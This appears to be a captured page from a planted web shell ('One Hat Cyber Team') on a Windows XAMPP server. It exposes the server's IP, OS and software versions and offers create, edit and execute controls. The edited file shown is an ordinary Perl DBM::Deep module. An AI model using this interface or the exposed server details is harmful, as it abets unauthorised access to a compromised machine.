One Hat Cyber Team
Your IP :
172.16.0.254
Server IP :
58.26.163.33
Server :
Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Server Software :
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
PHP Version :
7.3.25
Buat File
|
Buat Folder
Eksekusi
Dir :
C:
/
xampp7
/
perl
/
vendor
/
lib
/
DBM
/
Deep
/
Edit File:
Sector.pm
package DBM::Deep::Sector; use 5.008_004; use strict; use warnings FATAL => 'all'; use Scalar::Util (); sub new { my $self = bless $_[1], $_[0]; Scalar::Util::weaken( $self->{engine} ); $self->_init; return $self; } sub _init {} sub clone { my $self = shift; return ref($self)->new({ engine => $self->engine, type => $self->type, data => $self->data, }); } sub engine { $_[0]{engine} } sub offset { $_[0]{offset} } sub type { $_[0]{type} } sub staleness { $_[0]{staleness} } sub load { die "load must be implemented in a child class" } 1; __END__
Simpan